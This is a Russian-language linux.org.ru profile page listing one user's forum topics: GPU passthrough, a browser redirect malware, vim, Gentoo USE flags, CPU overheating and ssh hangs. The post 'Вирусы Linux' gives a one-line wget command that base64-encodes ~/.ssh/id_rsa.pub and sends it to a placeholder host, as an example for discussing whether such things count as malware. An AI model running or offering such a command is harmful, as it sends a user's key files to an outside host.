LINUX.ORG.RU

Сообщения Noloboot

 

Выбор процессора для десктопной виртуализации

Хочу собрать рабочий/домашний компьютер, соотвественно нужна возможность использовать разные среды в виртуалках, в том числе пробрасывать GPU в гостевую винду для игр.

Поделитесь историями успеха, если кто-то делал подобную схему, какую конфигурацию использовали? Есть ли какая-то разница в виртуализации и пробросе видеокарты между процессорами Intel и AMD?

 , , ,

Noloboot
()

Удаление «кликера»

Здравтсвуйте.

Не заметил как попал «кликер» в мобильный браузер. Возможно, подцепился с установкой какого-то приложения из плей маркета(племянник ставит все без разбора оттуда)

Поведение следующее: 1) При переходе на какой-либо сайт(через Google Chrome, встроенные браузеры в Facebook, Telegram etc) время от времени начинает переадресацию на http://www.gocloudly.com/rd.html без возможности вернуться на исходную страницу 2) Синхронизируется с дестктопным браузером. Поэтому теперь и на десктопных Google Chrome и Chromium при синхронизации появляется этот зловред. Правда вместо переадресации реагирует на клик и открывает http://www.gocloudly.com/rd.html в новой вкладке.

Мне вообще стало интересно как он смог так крепко обосноваться, поэтому вопрос: в какую сторону нужно смотреть и копать, чтобы найти где он обосновался, как синхронизируется и в итоге как его удалить?

 , ,

Noloboot
()

Каждодневные usecase vim

Здравствуйте.

Все пытаюсь приучить себя к vim как к основному редактору написания кода, но обычно надолго не хватает, так как скорость разработки падает. Хотя может это временный эффект, до того момента пока не разобрался с ним.

Вот стало интересно, у какого есть какие каждодневные сценарии использования возможностей в vim, которые его выгодно отличают от остальных редакторов и даже ide? Какие задачи он помогает решать быстрее и лучше чем в других редакторах?

 , ,

Noloboot
()

USE flag ne primenyaetsya

Zdravstvuyte.

Srazu izvinyaus' za translit.

Tut horoshee soobshestvo, do etogo horoshie soveti dovali, dumayu i tut pomojete. Hochu ustanovit' packet www-client/qupzilla s podderjkoy qt5.

V make.conf qt5 flag ustanovlen, v /etc/porateg/packages.use toje(hotya globalno i tak stoit). Pri zapuske emerge poluchayu sleduyushuyu kartinu(primerno):

The ebuild ...  has unmet requirements
....
USE="... -qt4 (-qt5)" ...
...
The followed REQUIRED_USE flag constrains are unstatisfied:
exactly-one-of(qt4 qt5)
....

Drugie packeti, gde est' flag qt5, takje ne reagiruyut.

Daje esli propisat':

USE="-qt4 qt5" emerge www-clien/qupzilla
rezultat budet totje.

 , ,

Noloboot
()

kworker/0:x сильная загрузка CPU

Здравствуйте, система тормозит. Посмотрел список процессов, увидел аномальную загрузку CPU процессом kworker/0:x(x — цифра 0, 2 т.е бывают различные). Сейчас перешел на Gentoo, но с Ubuntu была схожая ситуация.

Вот строчка из top:

PID     USER    PR    NI   VIRT   RES   SHR S    %CPU   %MEM  COMMAND
4860    root    20    0    0      0     0 R      77.2   0.0    kworker/0:0

Данное событие совпадает с перегревом процессора(как я понял из лога, не могу скопировать, приведу примерно):

CPU0: Core temperature above threshold, cpu clock throttled (total events = 114005)
CPU0: Package temperature above threshold, cpu clock throttled (total events = 114164)
.....
CPU2: Package temperature/speed normal
....
mce: [Hardware Error]: Machine check events logger

Кто-то сталкивался с подобным? Или как можно выяснить причины подобного?

UPD: sensors показывют следующее

Physical id 0: +70.0C (hight = +80.0C, crit = +85.0C)
Core 0:        +69.0C (hight = +80.0C, crit = +85.0C)
Core 1:        +65.0C (hight = +80.0C, crit = +85.0C)

 , ,

Noloboot
()

Установка пакета со всеми зависимостями в отдельную директорию

Здравствуйте.

Решил улучшть свои навыки и знания linux, установив gentoo. Никогда раньше не пользовался этой системой, посему таков вопрос: как установить конкретный пакет со всеми зависимостями в отдельную директорию(отдельный корень)?

Например, я еще не настроил графическую систему, а телеграм уже нужен. Есть консольный вариант этого мессенджера, поэтому установлю его временно. Всвязи с этим не хочу захламлять систему. Возможно ли сделать так, чтобы этот пакет установился в отдельную директорию со всеми зависимостями, но при этом существующие в системе зависимости брал из самой системы, чтобы не грузить пол системы?

Это лишь один из вариантов использования, есть и другие.

 , ,

Noloboot
()

Что вы хотите узнать о других странах и о путешествиях?

Вот стало интересно: кто и что хотел бы увидеть и узнать про другие города и страны?

Будь то в качестве путешественника или же как хорошее место для жизни: люди, места, работа, достопримечательности, то, что вы бы первым делом спросили у человека, приехавшего из интересующего вас города или страны, ведь он, возможно, смог бы рассказать то, что трудно узнать на просторах интернета.

И, хотелось бы, поддержать тему в свободном от «шума» виде. Буду рад, если воздержитесь, от сообщений подобных «нинужно/нужно» новостях про ПО, или же «ШГ\ШНГ» в сообщениях про скриншоты. Так же, был бы очень рад если тема обсуждений не уйдет совсем в неизвестном направлении.

Благодарю если поделитесь мнением и очень благодарю, если поддержите просьбу про формат обсуждения :)

 , ,

Noloboot
()

Ненавистникам проприетарного софта

Не раз видел, как со стороны отдельных персон открытого сообщества прям так и прет ненависть к любому проприетарному софту, мол, используя его, человек ограничивает свою свободу.

Я бы хотел сказать одно: Категорические принятие в штыки и отказ от закрытого софта, ограничивает свободу человека.

Если есть два эквивалентных софта, то можно выбрать в сторону того, который больше нравится(открытость, удобство, симпатия). Если полноценного аналога закрытого софта нету, тогда, отказываясь от этого софта из принципа, человек сам себя ограничивает.

Так давай те же адекватно относится ко всему, а фанатизм применять с умом.

 , , закрытое по,

Noloboot
()

Зависания ssh

Здравствуйте, столкнулся со следующей проблемой: когда работаю по ssh, то через какое-то время(когда как), все просто подвисает, то есть перестает реагировать на какие либо действия. Приходится перезаходить заново. Так же настроил монтирование через sshfs, и такое же поведение наблюдается..

Из-за чего происходит данная ситуация и как она исправляется?

 ,

Noloboot
()

Зачем нужен updatedb.findutils и как его отрубить?

Время от времени жутко грузит дисковую систему процесс find, запущенный от nobody пользователя. В htop показывает что он запущен от крона и процесса updatedb.findutils, но для чего он, не понял. Но тем временем жутко бесит такое поведение, так как в эти моменты начинаются тормоза системы. Ну кто до такого топорного решения додумался? Как его отключить можно или полностью удалить?

Noloboot
()

Хитрые комманды по работе с файлами.

Кратко: есть задание, составить программу которая эмулирует файловый менеджер(набор команд) идентичный командам(без дополнительных параметров):mkdir, touch, ls, rm, cp, pwd.

Суть темы: прошу пользователей ЛОР, помочь с составлением хитрых(особо, не очень) тестов для проверки корректности моей программы.

 

Noloboot
()

Очередной телефона выбора тред

Здравствуйте. Выбираю сматрфон между двумя кандидатами: Samsung Galaxy S3 и Sony Xperia V, какой из них посоветуете(желательно личный опыт и информация, которую не узнать из характеристик)?

Критерии:

  • в меньшей степени лопата
  • лучшее качество снимков (больше хороших отзывов на счет Xperia было)
  • время жизни от батарейки
  • глючность (xperia s глючили в свое время ой как нехорошо)

Или может есть другой телефон под эти критерии подпадающий и в эту ценовую категорию?

 samsung galaxy s3, sony xperia v

Noloboot
()

Кривость патчей ubuntu

Часто слышу такую фразу от здешних обитателей, но ни разу не видел ссылки на эти самые кривые патчи, кто то из лоровцев мне хотел отправить, но так и не отправил. Давайте в этой теме попробуем собрать такие патчи и оценить их кривость, что бы все таки подобные фразу не были голословными.

 , кривость,

Noloboot
()

Вирусы Linux

Вот есть вопрос, можно ли подобные штуки называть вирусами, в широком смысле(все что вредоносное, а не то что вирус по определению)?

 wget http://test.test/sendme?=`base64 ~/.ssh/id_rsa.pub`
Прав лишних не требует, работает вне зависимости от дистрибутива, незаметно для пользователя отправляет данные. Таких однострочников думаю можно придумать много.

 , ,

Noloboot
()

Ubuntu x64 + KDE + 2800 RAM (+3800 SWAP )

Хочу перейти на 64 бит, но пока что нет возможности доапгрейдить ноут до 8 гигов ОЗУ. На указанной в заголовке конфигурации будет достаточно ОЗУ для комфортной работы в KDE + виртуалки по-мелочи?

 ,

Noloboot
()

Достучаться по ssh

Здравствуйте, установил и настроил GitLab в virtualbox. host:MacOS X, guest: Ubuntu 13.04, все вроде бы хорошо, до тех пор пока не пришло время клонировать репозиторий.

при git clone .. или просто при: ssh mac-ip-here просит ввести пароль, но все пароли которые знал не подходят.

Все поднято в виртуалке, в virtualbox пробросил порты 22 и 80 в виртуалку.

Вопрос: При подключении по ssh все время просит пароль, как выявить кто именно хост или гость просит?

П.С. Пробросил порт не по умолчанию, вроде бы доходит до гостевой ОС.

 , , ,

Noloboot
()

Как в KDE устанавливать отдельные стили kwin для определенных приложений?

Хочу для krita сделать декорации окон темными, в тон самой программе, но не затронув стиль по умолчанию для других программ. Как могу это сделать?

 , ,

Noloboot
()

Масштабы окна приложения

Здравствуйте. Необходимо время от времени тестировать игру с разрешением 2048х1536, которое не умещается в экран монитора. Можно ли как нибудь для этого окна изменить масштаб пикселей? Что бы разрешение игры осталось неизменным, а размеры окна меньше

 размеры окон

Noloboot
()

За что здесь так не уважают Ubuntu?

В продолжении тем неуважения

 

Noloboot
()

Scintilla альтернативы

Существуют ли альтернативные компоненты, по функциональности схожие с Scintilla?

 

Noloboot
()

RSS подписка на новые темы